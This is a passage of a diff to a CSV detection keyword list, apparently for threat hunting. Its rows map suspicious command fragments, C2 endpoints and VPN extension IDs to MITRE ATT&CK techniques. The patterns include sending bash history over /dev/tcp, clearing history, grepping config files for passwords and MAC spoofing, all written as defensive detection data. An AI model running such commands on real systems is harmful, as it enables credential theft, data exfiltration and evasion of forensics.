TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" "*grep -* *DBPassword*","greyware_tool_keyword","grep","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. # search for plain text user/passwords","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege escalation","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*grep *password /var/www*","greyware_tool_keyword","grep","search for passwords","T1005 - T1083 - T1213","TA0006","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" "*grep *password.* /etc/*.conf*","greyware_tool_keyword","grep","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. # search for plain text user/passwords","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege escalation","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" @@ -571,18 +571,18 @@ "*higioemojdadgdbhbbbkfbebbdlfjbip*","greyware_tool_keyword","Unlimited VPN & Proxy by ibVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" "*hipncndjamdcmphkgngojegjblibadbe*","greyware_tool_keyword","RusVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" "*history -a* tail -n1 ~/.bash_history > /dev/tcp/*/*","greyware_tool_keyword","bash keylogger","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Exploitation tools","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" -"*history -c*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z" +"*history -c*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" "*history -d -2 && history -d -1*","greyware_tool_keyword","history","Removes the most recently logged command.","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*hnmpcagpplmpfojmgmnngilcnanddlhb*","greyware_tool_keyword","Windscribe","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" "*hoapmlpnmpaehilehggglehfdlnoegck*","greyware_tool_keyword","Tunnello VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" -"*http*.sslip.io*","greyware_tool_keyword","sslip.io","sslip.io is a DNS server that maps specially-crafted DNS A records to IP addresses e.g. 127-0-0-1.sslip.io maps to 127.0.0.1","T1568.002 - T1048.003","TA0003 - TA0004","N/A","N/A","C2","https://github.com/cunnie/sslip.io","1","1","letigimate tool abused by threat actor to bypass IP blockage and encrypt traffic","6","10","463","63","2023-10-02T11:53:54Z","2015-08-26T18:43:35Z" +"*http*.sslip.io*","greyware_tool_keyword","sslip.io","sslip.io is a DNS server that maps specially-crafted DNS A records to IP addresses e.g. 127-0-0-1.sslip.io maps to 127.0.0.1","T1568.002 - T1048.003","TA0003 - TA0004","N/A","N/A","C2","https://github.com/cunnie/sslip.io","1","1","letigimate tool abused by threat actor to bypass IP blockage and encrypt traffic","6","10","464","64","2023-10-04T15:07:26Z","2015-08-26T18:43:35Z" "*http*//127.0.0.1:5001*","greyware_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*http*//localhost:5001*","greyware_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*http*://127.0.0.1:8081*","greyware_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*http*://localhost:8081*","greyware_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*http://127.0.0.1:8000/gate.html*","greyware_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1043 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","1","N/A","10","10","4","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z" "*http://127.0.0.1:8081*","greyware_tool_keyword","Browser-C2","Post Exploitation agent which uses a browser to do C2 operations.","T1105 - T1043 - T1102","TA0003 - TA0005 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/Browser-C2","1","1","N/A","10","10","99","32","2018-05-25T15:12:21Z","2018-05-22T14:33:24Z" -"*http://localhost:7681*","greyware_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","111","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*http://localhost:7681*","greyware_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" "*https://*.*.devtunnels.ms*","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*https://*.brs.devtunnels.ms/*","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","0","1","N/A","8","10","N/A","N/A","N/A","N/A" "*https://*.euw.devtunnels.ms*","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","0","1","N/A","8","10","N/A","N/A","N/A","N/A" @@ -635,26 +635,26 @@ "*igahhbkcppaollcjeaaoapkijbnphfhb*","greyware_tool_keyword","Social VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" "*import PyInstaller*","greyware_tool_keyword","pyinstaller","PyInstaller bundles a Python application and all its dependencies into a single package executable.","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - TA0005","N/A","N/A","Execution","https://www.pyinstaller.org/","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*import SimpleHTTPServer*","greyware_tool_keyword","simplehttpserver","quick web server in python","T1021.002 - T1059.006","TA0002 - TA0005","N/A","N/A","Data Exfiltration","https://docs.python.org/2/library/simplehttpserver.html","1","0","N/A","6","10","N/A","N/A","N/A","N/A" -"*incorrect signature*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4099","1019","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" +"*incorrect signature*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" "*inligpkjkhbpifecbdjhmdpcfhnlelja*","greyware_tool_keyword","Free One Touch VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" "*Input line too long.*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z" "*install pyinstaller*","greyware_tool_keyword","pyinstaller","PyInstaller bundles a Python application and all its dependencies into a single package executable.","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - TA0005","N/A","N/A","Execution","https://www.pyinstaller.org/","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*install snmpcheck*","greyware_tool_keyword","snmpcheck","automate the process of gathering information of any devices with SNMP protocol support. like snmpwalk - snmpcheck allows you to enumerate the SNMP devices and places the output in a very human readable friendly format. It could be useful for penetration testing or systems monitoring","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","http://www.nothink.org/codes/snmpcheck/index.php","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*install tshark*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" -"*invalid certificate signing key*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4099","1019","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" -"*invalid elliptic curve value*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4099","1019","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" +"*invalid certificate signing key*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" +"*invalid elliptic curve value*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" "*Invoke-EnumerateLocalAdmin -Verbose*","greyware_tool_keyword","powershell","Find local admins on the domain machines","T1069.002 - T1087.002 - T1018","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*Invoke-UserHunter -CheckAccess*","greyware_tool_keyword","powershell","Check local admin access for the current user where the targets are found","T1078.003 - T1046 - T1087.001","TA0002 - TA0007 - TA0040","N/A","N/A","AD Enumeration","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*Invoke-WebRequest ifconfig.me/ip*Content.Trim()","greyware_tool_keyword","powershell","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*iocnglnmfkgfedpcemdflhkchokkfeii*","greyware_tool_keyword","sVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" "*iolonopooapdagdemdoaihahlfkncfgg*","greyware_tool_keyword","Azino VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" "*ip l set dev * address *:*:*","greyware_tool_keyword","ip","changing mac address with ip","T1497.001 - T1036.004 - T1059.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","5","10","N/A","N/A","N/A","N/A" -"*ipscan 1*.255*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3517","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" -"*ipscan 10.*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3517","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" -"*ipscan 172.*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3517","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" -"*ipscan 192.168.*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3517","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" -"*ipscan.exe -*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3517","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" -"*ipscan-win64-*.exe*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","1","N/A","7","10","3517","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"*ipscan 1*.255*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"*ipscan 10.*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"*ipscan 172.*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"*ipscan 192.168.*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"*ipscan.exe -*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"*ipscan-win64-*.exe*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","1","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" "*Ivy_1*_darwin_amd64*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "*Ivy_1*_linux_amd64*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "*Ivy_1*_windows_amd64.exe*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" @@ -692,15 +692,15 @@ "*libwiretap13*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*lklekjodgannjcccdlbicoamibgbdnmi*","greyware_tool_keyword","Anonymous Proxy Vpn Browser","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" "*llbhddikeonkpbhpncnhialfbpnilcnc*","greyware_tool_keyword","ProxyFlow","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" -"*ln -sf /dev/null *bash_history*","greyware_tool_keyword","bash","Clear command history in linux which is used for defense evasion. ","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8145","2531","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z" +"*ln -sf /dev/null *bash_history*","greyware_tool_keyword","bash","Clear command history in linux which is used for defense evasion. ","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8147","2532","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z" "*lneaocagcijjdpkcabeanfpdbmapcjjg*","greyware_tool_keyword","Hub VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" "*lnfdmdhmfbimhhpaeocncdlhiodoblbd*","greyware_tool_keyword","VPN PROXY MASTER","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" -"*Local: crc32 compensation attack*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4099","1019","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" +"*Local: crc32 compensation attack*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" "*locate password | more*","greyware_tool_keyword","locate","Find sensitive files","T1083 - T1213.002 - T1005","TA0007 - TA0010","N/A","N/A","discovery","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*lochiccbgeohimldjooaakjllnafhaid*","greyware_tool_keyword","IP Unblock","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" "*macchanger -r *","greyware_tool_keyword","macchanger","changing mac address with macchanger","T1497.001 - T1036.004 - T1059.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","5","10","N/A","N/A","N/A","N/A" "*macdlemfnignjhclfcfichcdhiomgjjb*","greyware_tool_keyword","Free Fast VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" -"*MacOS/ipscan -*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3517","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"*MacOS/ipscan -*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" "*majdfhpaihoncoakbjgbdhglocklcgno*","greyware_tool_keyword","Free VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" "*MATCH (c:Computer {unconsraineddelegation:true}) RETURN c*","greyware_tool_keyword","Neo4j","Neo4j queries - Computers in Unconstrained Delegations","T1210.002 - T1078.003 - T1046","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*MATCH (c:Computer)*(t:Computer)* *-[:AllowedToDelegate]* return p*","greyware_tool_keyword","Neo4j","Neo4j queries - Computers AllowedToDelegate to other computers","T1210.002 - T1078.003 - T1046","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False 